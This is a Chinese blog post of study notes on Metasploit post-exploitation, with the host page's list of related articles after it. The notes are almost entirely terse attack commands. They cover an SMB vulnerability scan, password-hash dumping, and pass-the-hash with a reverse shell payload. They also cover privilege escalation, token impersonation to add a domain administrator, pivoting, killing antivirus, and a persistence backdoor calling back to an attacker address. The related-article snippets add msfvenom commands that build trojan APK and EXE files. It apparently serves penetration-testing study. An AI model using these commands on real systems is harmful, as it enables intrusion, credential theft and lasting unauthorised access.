Metasploit学习之渗透攻击之旅

最新推荐文章于 2023-01-15 21:56:11 发布
最新推荐文章于 2023-01-15 21:56:11 发布
阅读量224 收藏 2
点赞数
分类专栏: 网络安全 metasploit 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44479297/article/details/103868450
版权

文章目录

渗透攻击之旅

渗透攻击基础
  1. Metasploit框架中包含数百个模块,在MSF终端中运行show命令可以把所有模块显示出来。
  2. 命令:
    show exploits 显示所有可用的渗透攻击模块
    show auxiliary 显示所有的辅助模块以及它们的用途
    show options 显示各个模块正确运行所需的各种设置。
    show payloads 显示与当前模块兼容的攻击载荷。
    show targets 显示收到漏洞影响目标系统的类型
渗透流程
  1. nmap -sT -A --script=smb-check-vulns =Po xx.xx.xx.xx
  2. search ms08_067_netapi
全端口攻击载荷:暴力猜解目标开放的端口

set payload windows/meterpreter/reverse_tcp_allports

Meterpreter

screeshot截屏
sysinfo获取系统运行的平台
ps获取目标系统正在运行的进程
migrate 1668将会话迁移至其他进程空间

挖掘用户名和密码
  1. 提取密码哈希值
  2. use priv
  3. run post/windows/gather/hashdump
  4. 传递哈希值
  5. use windows/smb/psexec
  6. set payload windows/meterpreter/reverse_tcp
  7. set lhost 11.11.11.11
  8. set lport 443
  9. set rhost 11.11.11.11
  10. set SMBPass aaddxxxxxxxx
  11. exploit
权限提升
  1. use priv
  2. getsystem
  3. getuid
令牌假冒
  1. ps
  2. steal_token 380 380是PID参数
  3. use incognito通过这个命令加载incognito模块
  4. list_tokens -u
  5. impersonate_token SNEAKS.IN\\ihazdomainadmin
  6. add_user join 123456 -h 192.168.33.50添加新用户
  7. add_group_user "Domain Admins" join -h 192.168.33.50赋予管理员权限
通过跳板攻击其他机器
  1. run get_local_subnets
  2. run autoroute -s 192.168.33.0/24
  3. 使用arp_sweep辅助模块对内网存活主机进行扫描
使用Meterpreter脚本
  1. run vnc 在远程系统上安装VNC会话
  2. run screen_unlock这里将得到目标主机的VNC图形界面接口
  3. run post/windows/manage/migrate 迁移进程
  4. run killav关闭杀毒软件
  5. run hashdump 获取系统密码哈希值
  6. run packetrecorder -i 1 查看目标机上的所有流量
  7. run scraper 攫取系统信息
  8. run persistence -X -i 50 -p 443 -r 192.168.33.129
向后渗透模块转变
  1. run post/windows/gather/hashdump 获取密码哈希值
将命令行shell升级为Meterpreter
  1. sessions -u 1
不断积淀
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
metasploit自动化渗透攻击模块
11-18
metasploit自动化渗透攻击模块db_autopwn
全端口攻击载荷:暴力目标开放端口
最新发布
qq_43093288的博客
03-26 149
本次实验我们复现了防火墙只允许在指定端口连接,我们利用Metasploit的allports攻击载荷完成代替手工测试允许端口的实验。
渗透测试入门教程(非常详细),从零基础入门到精通,看完这一篇就够了
热门推荐
Python_0011的博客
01-07 3万+
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。网络安全产业就像一个江湖,各色人等聚集。
Kali 2021:用Metasploit实验入侵自己的安卓手机
weixin_52221158的博客
07-19 9903
报错详细解决
小白的渗透攻击学习记录
qq_39405602的博客
03-07 332
小白的渗透攻击学习记录前言系统和工具1.文件上传攻击(File Upload) 前言 大家好,本人是刚接触渗透攻击以及如何去防御的小白,本篇文章将会记录我自己的学习流程,同时也可以供其他小白学习。本文主要会记录我在学习渗透过程中遇到的问题,以及解决方案。欢迎其他大佬来指出我操作中的不足,还望大家多多关照。 系统和工具 本次学习流程中所用到的系统和工具 虚拟机管理器(Oracle VM VirtuaBox) 虚拟机1(Win10,Kali Linux,Ubuntu) 测试平台1(pikachu,OWASP)
Metasploit生成Android木马远控自己的安卓设备
qq_59235193的博客
01-15 5097
我们先用frp工具来实现端口映射,利用处在内网的攻击机kali实现对处在外网
渗透测试之Metasploit
06-16
本套教程,我们将为大家详细讲解Metasploit的使用方法。 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
**Metasploit渗透测试指南** 渗透测试是一种授权的安全测试,旨在发现并评估计算机网络和系统的弱点,以增强安全防御。Metasploit是一款广泛使用的开源工具,专为安全专业人士设计,用于执行这种测试。本指南将深入...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
MetaSploit渗透攻击平台
04-20
### MetaSploit渗透攻击平台 #### 一、MetaSploit框架简介 MetaSploit Framework(MSF)是一款开源的安全评估工具,自2003年起便以开放源代码的形式发布,为广大安全研究者和渗透测试工程师提供了一个强大的平台。...
利用metasploit对手机进行渗透实战
qq_52907838的博客
08-18 3205
第一步:用ifconfig命令查看本机ip地址 第二步:用msfvenom -p命令生成apk木马文件 具体命令为 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.101.7 lport=8848 R > /home/kali/桌面/muma.apk 说明:lhost后面的IP地址为刚刚查到的本机IP(这里也可以不用本机IP),lport后面为自己规定的端口号,我规定的为8848,R为指定文件格式,后面接生成apk的
Metasploit渗透测试学习笔记——5、渗透攻击流程
Fly_鹏程万里
05-16 4895
Metasploit渗透攻击基础Metasploit中有数百个模块,没有人可以将他们全部都记下来,但是你可以在使用的时候使用msf终端命令“show”获取详细的信息,本小节主要为大家讲解一些Metasploit中的常用的命令格式与语句:(1)msf>show  exploits命令含义:显示Metasploit框架中所有可以使用的渗透攻击模块。(2)msf>show  auxiliar...
Metasploit(msf)系列-木马生成
chaojixiaojingang
09-28 3万+
原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。 msfvenom命令行选项如下: Options:     -p, --payload    <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者s...
kali metasploit 木马入侵windows和Android
qq_38611079的博客
09-21 1万+
windows :根据自己的kali IP 生成木马 注意shell > shell.exe之间是有空格的,LHOST是kali 本机的IP ,LPORT是自定义设置的端口,据说高端口比较好过防火墙,(但是我实验的时候感觉差不多,基于win10 的实验,防火墙需要全关了,不然木马文件根本过不去) 生成木马后的文件在本机的主目录下。 生成木马后,要把木马拖到要攻击的目标主机下...
老师傅的渗透攻击经验,速下,认真学
sanMu_blog的博客
02-22 1751
Micro8 “渗透攻击”经验整理 :https://github.com/Micropoor/Micro8 内容部分截图:
使用Metasploit入侵安卓手机(超详细哦)
chengman3837的博客
03-29 1万+
本文原创作者:newbie,本文属i春秋原创奖励计划,未经许可禁止转载! 1.环境准备: Kali2.0(msfVENOM、metasploit) 安卓手机 2.利用过程: 使用msfvenom生成apk木马 msfvenom -p android/meterpreter/rev...
实战Metasploit之安卓渗透舍友
大方子
09-13 6818
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用 安卓手机在移动端占有很高的比重,今天就带领大家一块利用Metasploit进行一次渗透,安卓渗透和windows其实差不多的,好啦,不废话了,正题开始。 环境:kali linux 2016.02和安卓手机一部 准备工作:当然是查看自己的ip啦~ 正式开始: 首先,生成一个反弹木马:在终端输入  msfve...
渗透测试之学习使用metasploit
Jeanphorn的专栏
06-28 9164
1. 介绍  Metasploit渗透测试人员提供了大量友好、容易使用的工具。metasploit最初有HD Moore创建,后来被Nexpose漏洞扫描器的Radid7公司收购。在渗透测试过程中,可以手工完成的一些工作都可以通过metasploit来做。   Metasploit需要经常地更新,已维护最新的攻击库。可以每周运行以下命令更新metasploit。   # msfupdate2
简单渗透攻击
weixin_53443776的博客
03-20 7718
针对win(7/10)的简单渗透攻击 前言 这次只是个人的简单实验,请各位学习后不要用于不良途径,可以自行学习,但不要乱用哦! (!!!学习网络安全法!!!) 一、需要用到的工具 VMware(建议版本是15-16),分别有一台已经搭建好的kali与win(7/10)虚拟机 二、使用步骤 1.使用msf exploit入侵电脑(Win7/Win10皆可) 需要的工具:msfvenom . msfconsole (kali里面有) 制作一个简单的恶意软件,代码如下: msfvenom -p windows/m
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值